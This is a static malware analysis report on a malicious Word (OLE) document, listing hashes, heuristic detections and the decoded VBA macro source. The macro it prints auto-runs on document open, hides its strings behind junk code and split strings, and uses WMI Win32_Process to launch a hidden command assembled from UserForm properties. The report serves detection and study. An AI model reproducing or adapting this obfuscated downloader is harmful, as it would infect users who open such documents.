Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ab81e77c989ed08e…

MALICIOUS

Office (OLE)

124.1 KB Created: 2019-12-13 21:49:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: 14b91eb0a3adfb07b8a89440f3b78ebb SHA-1: 4d32b8801cb8aacae2160697b96cba42b6ca7868 SHA-256: ab81e77c989ed08efaf53c6813b0d8f2da7e789fa4254fab798afb6ad88cd2dd
292 Risk Score

Heuristics 9

  • ClamAV: Doc.Downloader.Sagent-7454445-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sagent-7454445-0
  • Malformed OLE auto-open stager with embedded ZIP payload critical OLE_RAW_MALFORMED_AUTOOPEN_STAGER
    Raw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Uudkpimgyjqmq = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Xmtcmcovmi.Zepmlzbwtd + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Kazylkuzf = CreateObject(Null & Uudkpimgyjqmq)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10946 bytes
SHA-256: 8495340664534ab71148e9fa8c1206b3621a39d006fdb47cb146c469f25588ae
Detection
ClamAV: No threats found
Obfuscation or payload: likely
239 of 353 identifiers look randomly generated (e.g. 'winOMDNmgmOMDNts') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Xmtcmcovmi"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Zepmlzbwtd, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Rbheeuczuaa = Gxrukoktavibm
Dompqccdqcind = Iiulysaldrcy
Ycrwgwgol = Dubrcagaimaga
Select _
 Case Dcixnelx
      Case 621
         Qrxwmuxg _
         = Hex _
         (931)
         Xyubqvxjtyvr = CVar(619)
         Sdfnasrx _
         = Hex(243)
      Case 261
         Ljjdvscaleg = CVar(121)
         Hhsgbdsez _
         = 28
         Eiojgwdapdph = CDate _
         (56)
      Case 646
         Nbvvfrvnvxgi = _
         CInt(788)
         Trmlonyndsu = Log(Fpfrzflo)
         Judzqnqdxknhx = Szvaxcaqp
End Select
   Wxyyfcuajiy = Ubrykrbtb
Zptoummdgm = Veclfzpmd
Lcbngutyvuo = Iggwwuruywv
Select _
 Case Gwtlqgjail
      Case 930
         Fjnnakgfmczst _
         = Hex _
         (67)
         Yumfftynx = CVar(97)
         Dippaunxql _
         = Hex(575)
      Case 201
         Ymppwdxar = CVar(143)
         Kfvfnggvqjpgy _
         = 896
         Bffwzxuontqeb = CDate _
         (655)
      Case 489
         Dsdkfjfozrkpn = _
         CInt(65)
         Fqazbsvvba = Log(Hmxcelqfwdn)
         Wqfepigreoz = Ighxbkps
End Select
   Zgewhemwrzvse = Ehukrdgrajm
Ojqeaobvjdr = Etlelbmygegsu
Oemujyihiqrp = Ueceszmgvxli
Select _
 Case Ekmguigfq
      Case 402
         Awmdotlifladn _
         = Hex _
         (660)
         Giipjbjacydl = CVar(697)
         Mpofhrdacgdza _
         = Hex(546)
      Case 807
         Egzeycxwanvrv = CVar(445)
         Kiqmtwlyg _
         = 833
         Fgcmkbzexreg = CDate _
         (798)
      Case 95
         Osnsmahqxwui = _
         CInt(963)
         Zsisugwruod = Log(Rlnfcusedxft)
         Pifrbniefj = Pwxyzosiqe
End Select
Szurvytvyyqw
End Sub


Attribute VB_Name = "Rlndryuf"
Attribute VB_Base = "0{53A8F9CE-F62A-424E-B48F-7773908C8B41}{98A791E9-1E45-466D-8930-7B5DEEEE7885}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Sfxuqprex"
Function Gffrrmoptrb()
   Pqtrejezznzb = Kasmtzhjhjls
Kttkhaqapomnr = Orkhyodbgzo
Ikgmzfpfu = Jajkdzgidtsr
Select _
 Case Kkgsmktnks
      Case 452
         Anlokubpx _
         = Hex _
         (634)
         Tygtgjmpt = CVar(250)
         Ovinhfbw _
         = Hex(417)
      Case 906
         Fuyswpjypln = CVar(20)
         Nufrmdydl _
         = 899
         Yqfwnwob = CDate _
         (947)
      Case 866
         Odiajudrdum = _
         CInt(78)
         Vtbnosrntry = Log(Jmkswmeqz)
         Qdivmhinwakdl = Iqbuljhd
End Select
Wcqjsesti = Xmtcmcovmi.Zepmlzbwtd
   Qswfsxekcft = Mtbbpcur
Uszoieuwtnhh = Bzacvridzpm
Vitpxbybn = Vfiiaqsfjm
Select _
 Case Brwylqtkczv
      Case 592
         Zyjgmnngrhp _
         = Hex _
         (681)
         Diwhzwvr = CVar(966)
         Bcmkthgvjjuar _
         = Hex(879)
      Case 330
         Wymjjkhplnkou = CVar(521)
         Cwhaidaduzllf _
         = 349
         Dqnhcyjih = CDate _
         (699)
      Case 131
         Naxjsmvkgxsr = _
         CInt(414)
         Wurkyzbqfktbm = Log(Toanppzg)
         Zqvrikznl = Rxinrxvm
End Select
Nhgjclmumuee = Wcqjsesti + Rlndryuf.Qgqdkfeugdwb + Rlndryuf.Mqzqbhomi + Rlndryuf.Cighjeqo
   Csgrspqptzf = Rezgxsbuauv
Bumpkdxaqb = Fvfuqrqzeup
Dsaucxkzjowce = Lqbchqsw
Select _
 Case Jdesehef
      Case 984
         Lxfodgpvh _
         = Hex _
         (940)
         Mcpootnzjkve = CVar(58)
         Uggegrxphqnk _
         = Hex(435)
      Case 966
         Bbwpnixbpeqnq = CVar(316)
         Wqtlvjair _
         = 407
         Uxuyaegpxho = CDate _
         (105)
      Case 609
         Lvtqcntaqik = _
         CInt(672)
         Yrpaseovoagq = Log(Hbiyikcaap)
         Dhqdokygf = Xpjrvwun
End Select
Bclbzisy = Nhgjclmumuee + Rlndryuf.Qbctdshrrq + Rlndryuf.Jsbztqzyrzvlq.ControlTipText
   Vafdqhsswlcgg = Ybdlfplezbia
Acytwxwrynqra = Dwsguqglxc
Wfcigrvvie = Gxhdpvnows
Select _
 Case Pufgtrbqo
      Case 604
         Mwfjaftc _
         = Hex _
         (716)
         Izxjdwbpu = CVar(26)
         Jxsllobr _
         = Hex(839)
      Case 326
         Vtxugjlmicqww = CVar(701)
         Ixquzbuzwczm _
         = 539
         Rrlxlnfaowm = CDate _
         (721)
      Case 891
         Llnnamqd = _
         CInt(732)
         Wcvbtashwn = Log(Kezktphitiky)
         Ipyahlzgpuq = Zwopbfuaio
End Select
Gffrrmoptrb = Obmmagkq + Bclbzisy + Obmmagkq
   Rgsnxjbvaf = Nqprefwxbff
Vbobowxdszlj = Pueqimmbfjc
Qcklbmucintm = Lvqehrphdwpw
Select _
 Case Tveztdhbh
      Case 402
         Xsohgldzsb _
         = Hex _
         (147)
         Fucdjznwesn = CVar(925)
         Jusflknctk _
         = Hex(717)
      Case 986
         Zwllxafn = CVar(506)
         Frzybtrffffux _
         = 907
         Tgrsmlkddj = CDate _
         (778)
      Case 520
         Khrhvgkp = _
         CInt(390)
         Nitknfuvf = Log(Adtovtmunwoz)
         Ynxknmckn = Ybxfjhddh
End Select
End Function
Function Szurvytvyyqw()
   Rsifgdnhf = Rnkwwvsf
Qfbcbbrdqiyen = Rlqhfgbvxbtsv
Mpbhbnhc = Wepdfmaz
Select _
 Case Kbyutpkd
      Case 370
         Jvhnvjdfkk _
         = Hex _
         (543)
         Mfjblrsptt = CVar(63)
         Skqgolddbwra _
         = Hex(176)
      Case 404
         Iwjuonta = CVar(599)
         Lrdsklpqypul _
         = 630
         Ryhghpniejjwf = CDate _
         (512)
      Case 598
         Jyruyuwik = _
         CInt(150)
         Gbchhxdmcqf = Log(Aecmtiofqlor)
         Tbvqxnrjlgx = Stwnelyuur
End Select
Uudkpimgyjqmq = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Xmtcmcovmi.Zepmlzbwtd + "rocess"
   Vxhspivbgesne = Toinoqsmmesw
Xumhsuqwnu = Hltvdabfpkuck
Kuowlfoj = Gludwanho
Select _
 Case Trbsvjxma
      Case 593
         Ksgczyutsbjox _
         = Hex _
         (866)
         Bsjgvvyvq = CVar(548)
         Eqvrwjxjbc _
         = Hex(721)
      Case 458
         Bpnvrfjdecoh = CVar(689)
         Toalwpym _
         = 399
         Xafzronf = CDate _
         (197)
      Case 931
         Irhahpgaibbnm = _
         CInt(566)
         Iiqfhvpujxq = Log(Lppjdhubga)
         Iydscjomi = Xzwbtwydq
End Select
Set Kazylkuzf = CreateObject(Null & Uudkpimgyjqmq)
   Cwjrkmmmvkr = Wbtboovn
Xczedypvnxhs = Iwkaumzkmk
Godlgaccm = Ijofoeksej
Select _
 Case Revsnumqplwr
      Case 616
         Bqhqpxskbrfh _
         = Hex _
         (106)
         Broxxvlhl = CVar(308)
         Hzzwwmxevcu _
         = Hex(75)
      Case 658
         Tlagcdngjgo = CVar(871)
         Ztghueaahxtof _
         = 443
         Cpdhgadlu = CDate _
         (422)
      Case 699
         Htiytkyzm = _
         CInt(726)
         Nhplnlohsxygd = Log(Hqxvhmdp)
         Rjejpfsdf = Rvmrxnmhjnfd
End Select
Yfqnbnriqp = Uudkpimgyjqmq + Rlndryuf.Isqpsnihjumy.ControlTipText + Rlndryuf.Ycsvbedywa.ControlTipText
   Skievftvm = Hvttfhtszpcx
Hewixzqd = Uceapwzarbx
Xymuekrqnt = Bxmpoddhcyc
Select _
 Case Ccpbfmfatzjk
      Case 396
         Twahjcmnzm _
         = Hex _
         (84)
         Ytzhyvka = CVar(130)
         Bphhwnhyd _
         = Hex(165)
      Case 645
         Rkkcrtzhpc = CVar(885)
         Combmaozell _
         = 394
         Zcgyfbjgug = CDate _
         (232)
      Case 3
         Egbltlfxafs = _
         CInt(537)
         Vxofdgzpss = Log(Ijbtjiidmhum)
         Zgxkujwlkd = Qzjzmoks
End Select
Ibeipjepmqn = Yfqnbnriqp + Xmtcmcovmi.Zepmlzbwtd
   Fydbrqhiykqps = Zgylllgh
Aucpsjdilz = Wogmhguzzhhnu
Zgmzratrves = Nhhtoajk
Select _
 Case Dzndjsnpvbtdc
      Case 639
         Vzdwkhpaslszo _
         = Hex _
         (117)
         Ieuhizdxjzip = CVar(383)
         Hkfitsbfn _
         = Hex(941)
      Case 971
         Ozvrrtzqbtpj = CVar(218)
         Zsbuxcssvkb _
         = 992
         Ufscrapuaif = CDate _
         (742)
      Case 714
         Jyvlsbksu = _
         CInt(613)
         Lqszwdkqecekj = Log(Ifvyjwbrstwkr)
         Yaftrbiq = Xpodenmuusewv
End Select
Set Szurvytvyyqw = CreateObject(Ibeipjepmqn)
   Krykiajrkyas = Eamauxnw
Dciwsvzngfibt = Yxqppoeqstp
Rmgnubhf = Zoymmqtcgt
Select _
 Case Awhhiympccayw
      Case 14
         Vgslkgkrarbsz _
         = Hex _
         (583)
         Jbrumjgnsit = CVar(468)
         Wozpsryvoi _
         = Hex(734)
      Case 908
         Pfgphgmrlty = CVar(928)
         Hpotzcqf _
         = 912
         Mrlzizvutrfw = CDate _
         (678)
      Case 947
         Xlchkxdqsolck = _
         CInt(50)
         Fjjpktxvger = Log(Eqvlkovnzjucr)
         Xofpsfohvhuga = Dthelcsasvhcf
End Select
Szurvytvyyqw.XSize = False * False
   Euvbabtlxuls = Olsbdueefv
Kbxmscoae = Sdxhxogfl
Vwhwdsozp = Wrsnkbjey
Select _
 Case Hayfnhqzplpe
      Case 12
         Fwywmfee _
         = Hex _
         (304)
         Fojdewhqx = CVar(461)
         Gyxfgipktgm _
         = Hex(555)
      Case 807
         Ffkhlcrcnq = CVar(452)
         Xmutdygflyxbr _
         = 146
         Ottatbwyzlzfv = CDate _
         (84)
      Case 662
         Thxgjwvqqh = _
         CInt(187)
         Bghjqffdj = Log(Hwaovietlwy)
         Ekwasddtmtu = Cizpfdarqkii
End Select
Szurvytvyyqw.YSize = False * False
   Taksmhrhgvux = Kctmnftswq
Mdoynjgwryiji = Vcyimskkbyg
Bbetcnvo = Hkrgvluje
Select _
 Case Ypyicgcsnzh
      Case 220
         Vpuogulzb _
         = Hex _
         (286)
         Yvmoygocqkc = CVar(629)
         Lagtwfiay _
         = Hex(829)
      Case 746
         Frfdjvrwvh = CVar(73)
         Unthlfwvs _
         = 629
         Dgosdwlqzjb = CDate _
         (649)
      Case 883
         Alsutgpya = _
         CInt(339)
         Fcxxvcqsbd = Log(Udnakrkxsemha)
         Cmopdncm = Ovxtiheyoxrff
End Select
Do While Kazylkuzf.Create(Null & Gffrrmoptrb, Vsmziygohc, Szurvytvyyqw)
Loop
   Wjazfbzfrfnbo = Oxurkgblrcb
Glhnyhicqjazu = Llfpevqlpmrs
Jxdjzzgxadgdk = Trphjzgwmne
Select _
 Case Sagomehlxquyl
      Case 715
         Ciaksxwvbk _
         = Hex _
         (728)
         Dbqvvjgfawrrg = CVar(217)
         Vauiylvt _
         = Hex(875)
      Case 984
         Uwcveeeagek = CVar(452)
         Zoeikfqjecva _
         = 408
         Bnlhhlian = CDate _
         (443)
      Case 152
         Vrnqzmrogv = _
         CInt(90)
         Dlnodqugvjxc = Log(Wcvlybayonct)
         Emolhuiwuxf = Ypmukdepotuw
End Select
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.